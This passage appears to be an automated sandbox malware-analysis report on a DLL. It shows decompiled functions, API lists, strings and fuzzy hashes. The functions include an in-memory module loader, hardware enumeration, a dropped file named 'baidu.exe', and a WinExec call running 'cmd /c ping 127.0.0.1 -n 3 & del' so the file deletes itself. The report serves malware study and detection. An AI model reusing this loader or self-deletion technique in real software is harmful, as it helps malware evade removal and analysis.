																			L49:
																			return _v76;
																		}
																		if( *(_v76 + 0x14) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v100 = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																		_v96 = _v100(_v24, 1, 0);
																		if(_v96 != 0) {
																			 *((intOrPtr*)(_v76 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E1001A960(_v76);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												_a16(_v24, 0, 0x8000, _a32);
												SetLastError(0xe);
												return 0;
											}
											_t225 = _a12(0, _v32, 0x3000, 4, _a32);
											_t333 = _t333 + 0x14;
											_v24 = _t225;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}

0x1001b620
0x1001b620
0x1001b620
0x1001b626
0x1001b62d
0x1001b64b
0x1001b654
0x1001b659
0x1001b65e
0x1001b66a
0x1001b678
0x1001b68f
0x1001b69d
0x1001b6a2
0x1001b6a7
0x1001b6b6
0x1001b6b9
0x1001b6c5
0x1001b6e6
0x1001b703
0x1001b725
0x1001b72e
0x1001b731
0x1001b74c
0x1001b75f
0x1001b77b
0x1001b761
0x1001b76a
0x1001b76a
0x1001b784
0x1001b789
0x1001b789
0x1001b740
0x1001b749
0x1001b749
0x1001b792
0x1001b7a8
0x1001b7b3
0x1001b7b8
0x1001b7be
0x1001b7e8
0x1001b7eb
0x1001b7ee
0x1001b7f5
0x1001b826
0x1001b837
0x1001b83e
0x1001b86a
0x1001b87c
0x1001b883
0x1001b88c
0x1001b895
0x1001b89e
0x1001b8a7
0x1001b8b0
0x1001b8b9
0x1001b8c2
0x1001b8d0
0x1001b8d5
0x1001b8da
0x1001b8fd
0x1001b90f
0x1001b91d
0x1001b923
0x1001b92d
0x1001b940
0x1001b945
0x1001b94a
0x1001b95c
0x1001b95f
0x1001b962
0x1001b97f
0x1001b964
0x1001b96c
0x1001b971
0x1001b977
0x1001b977
0x1001b98a
0x1001b98f
0x1001b994
0x1001b99f
0x1001b9a4
0x1001b9a9
0x1001b9b4
0x1001b9b9
0x1001b9be
0x1001b9cb
0x1001ba27
0x1001ba2e
0x00000000
0x1001ba2e
0x1001b9d4
0x1001ba1f
0x1001ba22
0x00000000
0x1001ba22
0x1001b9e1
0x1001b9ef
0x1001b9f6
0x1001ba08
0x00000000
0x1001ba08
0x1001b9fd
0x1001ba33
0x1001ba37
0x00000000
0x1001ba3f
0x00000000
0x1001b9c0
0x00000000
0x1001b9ab
0x00000000
0x1001b996
0x00000000
0x1001b94c
0x00000000
0x1001b8dc
0x1001b84f
0x1001b857
0x00000000
0x1001b85d
0x1001b808
0x1001b80b
0x1001b80e
0x1001b815
0x00000000
0x00000000
0x1001b819
0x00000000
0x1001b81f
0x1001b7c5
0x00000000
0x1001b7cb
0x1001b70a
0x00000000
0x1001b710
0x1001b6ed
0x00000000
0x1001b6f3
0x1001b6cc
0x00000000
0x1001b6d2
0x00000000
0x1001b6a9
0x1001b67f
0x00000000
0x1001b685
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1001B63E
GetProcAddress.KERNEL32(00000000), ref: 1001B645

Part of subcall function 1001AE40: SetLastError.KERNEL32(0000000D,?,1001B659,100207E4,00000040), ref: 1001AE4D

SetLastError.KERNEL32(000000C1), ref: 1001B67F

Strings

kernel32.dll, xrefs: 1001B639
GetNativeSystemInfo, xrefs: 1001B634

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorLast$AddressHandleModuleProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 1762409328-192647395
Opcode ID: e3701e4d903ec74dc5ef954786c854f9baa6ea88c08b49a674e627b22a4b0214
Instruction ID: 948ec142860bc01625bc2ce9e1704a97d6b06a0078abf06e4df2749841334317
Opcode Fuzzy Hash: e3701e4d903ec74dc5ef954786c854f9baa6ea88c08b49a674e627b22a4b0214
Instruction Fuzzy Hash: CAE1E5B4E00609DFDB04CF94C885AAEBBB5FF88304F648558E905AF395D774E982CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000E90E, Relevance: 25.6, APIs: 17, Instructions: 90
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E1000E90E() {
				int _t13;
				long _t19;
				signed int _t20;
				signed int _t21;
				signed int _t22;
				signed int _t23;
				signed int _t27;
				signed int _t28;
				signed int _t32;
				signed int _t33;
				void* _t37;
				long _t39;
				void* _t40;
				signed int _t47;
				struct _OSVERSIONINFOA* _t49;
				void* _t51;

				_t37 = GetProcessHeap;
				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
				if(_t49 != 0) {
					_t49->dwOSVersionInfoSize = 0x94;
					_t13 = GetVersionExA(_t49);
					__eflags = _t13;
					_push(_t49);
					_push(0);
					if(_t13 != 0) {
						 *(_t51 + 0xc) = _t49->dwPlatformId;
						 *(_t51 + 0x10) = _t49->dwMajorVersion;
						 *(_t51 - 4) = _t49->dwMinorVersion;
						_t47 = _t49->dwBuildNumber & 0x00007fff;
						HeapFree(GetProcessHeap(), ??, ??);
						_t19 =  *(_t51 + 0xc);
						__eflags = _t19 - 2;
						if(_t19 != 2) {
							_t47 = _t47 | 0x00008000;
							__eflags = _t47;
						}
						_t39 =  *(_t51 - 4);
						 *0x1033347c = _t19;
						_t20 =  *(_t51 + 0x10);
						_t44 = (_t20 << 8) + _t39;
						 *0x10333484 = (_t20 << 8) + _t39;
						 *0x10333488 = _t20;
						 *0x1033348c = _t39;
						 *0x10333480 = _t47;
						_t21 = E1000F7BF(1);
						__eflags = _t21;
						_pop(_t40);
						if(_t21 == 0) {
							goto L1;
						} else {
							_t23 = E100133E0(_t37);
							__eflags = _t23;
							if(_t23 != 0) {
								E10015081();
								 *0x10336f64 = GetCommandLineA();
								 *0x103332fc = E10014F4C(); // executed
								_t27 = E10014994(_t37, _t44, _t47, _t49, __eflags); // executed
								__eflags = _t27;
								if(_t27 >= 0) {
									_t28 = E10014E93(_t40);
									__eflags = _t28;
									if(_t28 < 0) {
										L15:
										E10014BD4();
										goto L10;
									} else {
										_t32 = E10014C20(_t40, _t44);
										__eflags = _t32;
										if(_t32 < 0) {
											goto L15;
										} else {
											_t33 = E1001167A(_t37, _t47, _t49, _t51, 0);
											__eflags = _t33;
											if(_t33 != 0) {
												goto L15;
											} else {
												 *0x103332f8 =  *0x103332f8 + 1;
												_t22 = 1;
												__eflags = 1;
											}
										}
									}
								} else {
									L10:
									E100130CA();
									goto L8;
								}
							} else {
								L8:
								E1000F819();
								goto L1;
							}
						}
					} else {
						HeapFree(GetProcessHeap(), ??, ??);
						goto L1;
					}
				} else {
					L1:
					_t22 = 0;
				}
				return _t22;
			}

0x1000e90e
0x1000e925
0x1000e929
0x1000e933
0x1000e935
0x1000e93b
0x1000e93d
0x1000e93e
0x1000e940
0x1000e953
0x1000e959
0x1000e95f
0x1000e962
0x1000e96b
0x1000e971
0x1000e974
0x1000e977
0x1000e979
0x1000e979
0x1000e979
0x1000e97f
0x1000e982
0x1000e987
0x1000e98f
0x1000e993
0x1000e999
0x1000e99e
0x1000e9a4
0x1000e9aa
0x1000e9af
0x1000e9b1
0x1000e9b2
0x00000000
0x1000e9b8
0x1000e9b8
0x1000e9bd
0x1000e9bf
0x1000e9cb
0x1000e9d6
0x1000e9e0
0x1000e9e5
0x1000e9ea
0x1000e9ec
0x1000e9f5
0x1000e9fa
0x1000e9fc
0x1000ea1e
0x1000ea1e
0x00000000
0x1000e9fe
0x1000e9fe
0x1000ea03
0x1000ea05
0x00000000
0x1000ea07
0x1000ea09
0x1000ea0e
0x1000ea11
0x00000000
0x1000ea13
0x1000ea13
0x1000eacc
0x1000eacc
0x1000eacc
0x1000ea11
0x1000ea05
0x1000e9ee
0x1000e9ee
0x1000e9ee
0x00000000
0x1000e9ee
0x1000e9c1
0x1000e9c1
0x1000e9c1
0x00000000
0x1000e9c1
0x1000e9bf
0x1000e942
0x1000e945
0x00000000
0x1000e945
0x1000e92b
0x1000e92b
0x1000e92b
0x1000e92b
0x1000ead1

APIs

GetProcessHeap.KERNEL32(00000000,00000094), ref: 1000E91C
HeapAlloc.KERNEL32(00000000), ref: 1000E91F
GetVersionExA.KERNEL32(00000000), ref: 1000E935
GetProcessHeap.KERNEL32(00000000,00000000), ref: 1000E942
HeapFree.KERNEL32(00000000), ref: 1000E945
GetProcessHeap.KERNEL32(00000000,00000000), ref: 1000E968
HeapFree.KERNEL32(00000000), ref: 1000E96B
__heap_term.LIBCMT ref: 1000E9C1
__RTC_Initialize.LIBCMT ref: 1000E9CB
GetCommandLineA.KERNEL32 ref: 1000E9D0
___crtGetEnvironmentStringsA.LIBCMT ref: 1000E9DB
__ioinit.LIBCMT ref: 1000E9E5
__mtterm.LIBCMT ref: 1000E9EE
__setargv.LIBCMT ref: 1000E9F5
__setenvp.LIBCMT ref: 1000E9FE
__cinit.LIBCMT ref: 1000EA09
__ioterm.LIBCMT ref: 1000EA1E

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
String ID:
API String ID: 2870529951-0
Opcode ID: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
Instruction ID: 130607f004240c79eb30421efa65504882722ed8364210b240487f0131cf44a3
Opcode Fuzzy Hash: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
Instruction Fuzzy Hash: 05317F75A043919BF750EFB2888175A77E8EF48381F21C429E909DA356EB34EC418B61

Uniqueness

Uniqueness Score: -1.00%

Function 1001A260, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A260() {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				int _t15;
				void* _t20;

				_v532 = 0;
				E1000CF20(_t20,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF20(_t20,  &_v267, 0, 0x103);
				GetModuleFileNameA(0,  &_v532, 0x104);
				E1000CC93(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
				_t15 = WinExec( &_v268, 0); // executed
				return _t15;
			}

0x1001a269
0x1001a27e
0x1001a286
0x1001a29b
0x1001a2b1
0x1001a2ca
0x1001a2db
0x1001a2e4

APIs

_memset.LIBCMT ref: 1001A27E
_memset.LIBCMT ref: 1001A29B
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A2B1
_sprintf.LIBCMT ref: 1001A2CA
WinExec.KERNEL32 ref: 1001A2DB

Strings

cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A2BE

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$ExecFileModuleName_sprintf
String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
API String ID: 2874319085-10483710
Opcode ID: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
Instruction ID: 1002a94702f99074cc5a7191c0e86848812ee27a6531f1c6c96f6cd2bf050705
Opcode Fuzzy Hash: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
Instruction Fuzzy Hash: 6EF0AF7988431C6AE720D760DC8AFE9772CAB20700F0005D4F6986A0C1EAF067C88BA2

Uniqueness

Uniqueness Score: -1.00%

Function 1001A600, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1001A600(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v52;
				char _v53;
				short _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v72;
				char _v335;
				char _v336;
				signed int _v340;
				void* __ebp;
				intOrPtr _t40;
				void* _t45;
				intOrPtr _t73;

				_t80 = __eflags;
				_t71 = __edi;
				_push(0xffffffff);
				_push(E10022A9E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_v340 = 0;
				E10001160( &_v52, __eflags, 0x10024ca1);
				_v8 = 0;
				_v336 = 0;
				E1000CF20(__edi,  &_v335, 0, 0x103);
				GetModuleFileNameA(0,  &_v336, 0x104);
				_t40 = E1001A170( &_v336); // executed
				_v24 = _t40;
				_v72 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v53 = 0;
				E1000CC93(_t71,  &_v72, "%d", _v24);
				_v20 = E1001A480(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
				_t81 = _v20;
				if(_v20 != 0) {
					E10001A90( &_v52, _t81, _v20);
					E10001A90( &_v52, _t81, ".exe");
					_push(_v20);
					E1000CA30(__ebx, _t71, __esi, _t81);
				}
				_t45 = E10001200( &_v52);
				_t82 = _t45;
				if(_t45 == 0) {
					E10001A90( &_v52, _t82, "baidu.exe");
				}
				E10001110(_a4, _t82,  &_v52);
				_v340 = _v340 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v52);
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x1001a600
0x1001a600
0x1001a603
0x1001a605
0x1001a610
0x1001a611
0x1001a61e
0x1001a630
0x1001a635
0x1001a63c
0x1001a651
0x1001a667
0x1001a674
0x1001a67c
0x1001a67f
0x1001a685
0x1001a688
0x1001a68b
0x1001a68e
0x1001a691
0x1001a695
0x1001a6a5
0x1001a6b9
0x1001a6bc
0x1001a6c0
0x1001a6c9
0x1001a6d6
0x1001a6de
0x1001a6df
0x1001a6e4
0x1001a6ea
0x1001a6ef
0x1001a6f1
0x1001a6fb
0x1001a6fb
0x1001a707
0x1001a715
0x1001a71b
0x1001a725
0x1001a730
0x1001a73a

APIs

_memset.LIBCMT ref: 1001A651
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667

Part of subcall function 1001A170: FindFirstFileA.KERNEL32(1001A679,?), ref: 1001A18E
Part of subcall function 1001A170: FindClose.KERNEL32(000000FF), ref: 1001A1B6

_sprintf.LIBCMT ref: 1001A6A5

Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6

Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9

Strings

.exe, xrefs: 1001A6CE
baidu.exe, xrefs: 1001A6F3

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
String ID: .exe$baidu.exe
API String ID: 3164538923-2273953317
Opcode ID: eaae4fab46b1e4210e375406be424a6574653a2564e2719a11e71cc4c1965c93
Instruction ID: 0ef21a583f90a00b500e35e1eebf572a8ff7ffe47b4923fec59976459a260394
Opcode Fuzzy Hash: eaae4fab46b1e4210e375406be424a6574653a2564e2719a11e71cc4c1965c93
Instruction Fuzzy Hash: E73169B5C10258ABEB14DFA0ED82FEDB7B4FF09744F000169F50AA7281EB746A44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10019960, Relevance: 7.7, APIs: 5, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E10019960(void* __ebx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v44;
				char _v48;
				char _v312;
				char _v572;
				char _v832;
				char _v1092;
				char _v1352;
				char _v1368;
				char _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				signed int _v1384;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t74;
				intOrPtr _t80;
				void* _t85;
				void* _t88;
				void* _t91;
				void* _t94;
				void* _t97;
				void* _t116;
				signed int _t150;
				void* _t164;
				void* _t168;
				void* _t171;
				void* _t174;
				void* _t177;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				intOrPtr _t187;
				void* _t188;
				void* _t189;
				void* _t191;
				void* _t193;
				void* _t194;
				void* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t202;
				void* _t203;

				_t116 = __ebx;
				 *[fs:0x0] = _t187;
				_t188 = _t187 - 0x558;
				_v1384 = 0;
				_t74 = E10003170( &_v1368, __eflags);
				_v8 = 0;
				_v1376 = 0;
				_v48 = 0;
				_v1372 = 0;
				__imp__SetupDiGetClassDevsA(0, 0, 0, 6, _t164, _t180,  *[fs:0x0], E10022A8C, 0xffffffff); // executed
				_v1380 = _t74;
				if(_v1380 != 0xffffffff) {
					E1000CF20(_t164,  &_v44, 0, 0x1c);
					_t189 = _t188 + 0xc;
					_v44 = 0x1c;
					while(1) {
						_t148 = _v1376;
						_t80 = _v1380;
						__imp__SetupDiEnumDeviceInfo(_t80, _v1376,  &_v44);
						if(_t80 == 0) {
							break;
						}
						E1000CF20(_t164,  &_v1352, 0, 0x514);
						_push( &_v1372);
						_push( &_v48);
						_push(0);
						_t191 = _t189 + 0xc - 0x1c;
						_t182 =  &_v44;
						memcpy(_t191, _t182, 7 << 2);
						_t168 = _t182 + 0xe;
						_push(_v1380); // executed
						_t85 = E10019780(_t116, _t182); // executed
						_t193 = _t191 + 0x38;
						_t213 = _t85;
						if(_t85 != 0) {
							E1000D190(_t116, _t168, _t182,  &_v1352, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t168, _t182, _t213);
							_t193 = _t193 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(7);
						_t194 = _t193 - 0x1c;
						_t183 =  &_v44;
						memcpy(_t194, _t183, 7 << 2);
						_t171 = _t183 + 0xe;
						_push(_v1380); // executed
						_t88 = E10019780(_t116, _t183); // executed
						_t196 = _t194 + 0x38;
						_t214 = _t88;
						if(_t88 != 0) {
							E1000D190(_t116, _t171, _t183,  &_v1092, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t171, _t183, _t214);
							_t196 = _t196 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0x16);
						_t197 = _t196 - 0x1c;
						_t184 =  &_v44;
						memcpy(_t197, _t184, 7 << 2);
						_t174 = _t184 + 0xe;
						_push(_v1380); // executed
						_t91 = E10019780(_t116, _t184); // executed
						_t199 = _t197 + 0x38;
						_t215 = _t91;
						if(_t91 != 0) {
							E1000D190(_t116, _t174, _t184,  &_v832, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t174, _t184, _t215);
							_t199 = _t199 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0xc);
						_t200 = _t199 - 0x1c;
						_t185 =  &_v44;
						memcpy(_t200, _t185, 7 << 2);
						_t177 = _t185 + 0xe;
						_push(_v1380); // executed
						_t94 = E10019780(_t116, _t185); // executed
						_t202 = _t200 + 0x38;
						_t216 = _t94;
						if(_t94 != 0) {
							E1000D190(_t116, _t177, _t185,  &_v572, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t177, _t185, _t216);
							_t202 = _t202 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(8);
						_t203 = _t202 - 0x1c;
						_t186 =  &_v44;
						memcpy(_t203, _t186, 7 << 2);
						_t164 = _t186 + 0xe;
						_push(_v1380); // executed
						_t97 = E10019780(_t116, _t186); // executed
						_t189 = _t203 + 0x38;
						_t217 = _t97;
						if(_t97 != 0) {
							E1000D190(_t116, _t164, _t186,  &_v312, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t164, _t186, _t217);
							_t189 = _t189 + 0x10;
						}
						_v1376 = _v1376 + 1;
						E10003310( &_v1368,  &_v1352, _t217,  &_v1352);
					}
					__imp__SetupDiDestroyDeviceInfoList(_v1380); // executed
				}
				E100031A0(_a4, _t148, __eflags,  &_v1368);
				_t150 = _v1384 | 0x00000001;
				__eflags = _t150;
				_v1384 = _t150;
				_v8 = 0xffffffff;
				E10003280( &_v1368); // executed
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x10019960
0x10019971
0x10019978
0x10019980
0x10019990
0x10019995
0x1001999c
0x100199a6
0x100199ad
0x100199bf
0x100199c5
0x100199d2
0x100199e0
0x100199e5
0x100199e8
0x100199ef
0x100199f3
0x100199fa
0x10019a01
0x10019a09
0x00000000
0x00000000
0x10019a1d
0x10019a2b
0x10019a2f
0x10019a30
0x10019a32
0x10019a3a
0x10019a3f
0x10019a3f
0x10019a47
0x10019a48
0x10019a4d
0x10019a50
0x10019a52
0x10019a66
0x10019a71
0x10019a72
0x10019a77
0x10019a77
0x10019a80
0x10019a84
0x10019a85
0x10019a87
0x10019a8f
0x10019a94
0x10019a94
0x10019a9c
0x10019a9d
0x10019aa2
0x10019aa5
0x10019aa7
0x10019abb
0x10019ac6
0x10019ac7
0x10019acc
0x10019acc
0x10019ad5
0x10019ad9
0x10019ada
0x10019adc
0x10019ae4
0x10019ae9
0x10019ae9
0x10019af1
0x10019af2
0x10019af7
0x10019afa
0x10019afc
0x10019b10
0x10019b1b
0x10019b1c
0x10019b21
0x10019b21
0x10019b2a
0x10019b2e
0x10019b2f
0x10019b31
0x10019b39
0x10019b3e
0x10019b3e
0x10019b46
0x10019b47
0x10019b4c
0x10019b4f
0x10019b51
0x10019b65
0x10019b70
0x10019b71
0x10019b76
0x10019b76
0x10019b7f
0x10019b83
0x10019b84
0x10019b86
0x10019b8e
0x10019b93
0x10019b93
0x10019b9b
0x10019b9c
0x10019ba1
0x10019ba4
0x10019ba6
0x10019bba
0x10019bc5
0x10019bc6
0x10019bcb
0x10019bcb
0x10019bd7
0x10019bea
0x10019bea
0x10019bfb
0x10019bfb
0x10019c0b
0x10019c16
0x10019c16
0x10019c19
0x10019c1f
0x10019c2c
0x10019c37
0x10019c43

APIs

SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 100199BF
_memset.LIBCMT ref: 100199E0
SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 10019A01
_memset.LIBCMT ref: 10019A1D

Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
Part of subcall function 10019780: GetLastError.KERNEL32 ref: 100197B2
Part of subcall function 10019780: _memset.LIBCMT ref: 100197DE
Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804

Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9

SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 10019BFB

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: Setup$Device$_memset$ErrorInfoLastPropertyRegistry$ClassDestroyDevsEnumFreeHeapList___sbh_find_block___sbh_free_block
String ID:
API String ID: 3323326763-0
Opcode ID: 34e1c9ea5a169ca6ee0ccc6309070e38f518e9ff025555c95e667d819486c7d5
Instruction ID: 92146aaf36cf8da670849d236f9b8fe300c912f778ed1f5ba4bfc820bf5b102a
Opcode Fuzzy Hash: 34e1c9ea5a169ca6ee0ccc6309070e38f518e9ff025555c95e667d819486c7d5
Instruction Fuzzy Hash: 7381B676D006089BDB14DBA4DC51FEFB379EB48311F048198F509B7281EB35AA85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001AB60, Relevance: 7.7, APIs: 5, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E1001AB60(intOrPtr* _a4) {
				void* _v8;
				intOrPtr* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				signed int* _v32;
				void* _v36;
				intOrPtr _v40;
				void* __ebp;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t122;
				void* _t130;
				void _t132;
				void _t137;
				void* _t144;
				void* _t159;
				void* _t194;
				void* _t201;
				void* _t202;
				void* _t203;
				void* _t204;

				_t2 = _a4 + 4; // 0xe90575c0
				_v20 =  *_t2;
				_v16 = 1;
				_v12 =  *_a4 + 0x80;
				if( *((intOrPtr*)(_v12 + 4)) != 0) {
					_v8 = _v20 +  *_v12;
					while(1) {
						_t108 = IsBadReadPtr(_v8, 0x14);
						__eflags = _t108;
						if(_t108 != 0) {
							break;
						}
						_t110 = _v8;
						__eflags =  *(_t110 + 0xc);
						if( *(_t110 + 0xc) == 0) {
							break;
						}
						_t18 = _a4 + 0x34; // 0x118bb84d
						_t23 = _a4 + 0x24; // 0xf3c7e850, executed
						_t113 =  *((intOrPtr*)( *_t23))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *_t18); // executed
						_t204 = _t203 + 8;
						_v36 = _t113;
						__eflags = _v36;
						if(__eflags != 0) {
							_t28 = _a4 + 0xc; // 0x52b8558b
							_push(4 +  *_t28 * 4);
							_t32 = _a4 + 8; // 0x98
							_push( *_t32);
							_t115 = E1000E018(_t144,  *_t32, _t201, _t202, __eflags);
							_t203 = _t204 + 8;
							_v28 = _t115;
							__eflags = _v28;
							if(_v28 != 0) {
								 *(_a4 + 8) = _v28;
								_t45 = _a4 + 0xc; // 0x52b8558b
								_t47 = _a4 + 8; // 0x98
								 *((intOrPtr*)( *_t47 +  *_t45 * 4)) = _v36;
								_t52 = _a4 + 0xc; // 0x52b8558b
								 *(_a4 + 0xc) =  *_t52 + 1;
								__eflags =  *_v8;
								if( *_v8 == 0) {
									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									_t122 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									__eflags = _t122;
									_v24 = _t122;
								} else {
									_v32 = _v20 +  *_v8;
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while(1) {
									__eflags =  *_v32;
									if( *_v32 == 0) {
										break;
									}
									__eflags =  *_v32 & 0x80000000;
									if(( *_v32 & 0x80000000) == 0) {
										_v40 = _v20 +  *_v32;
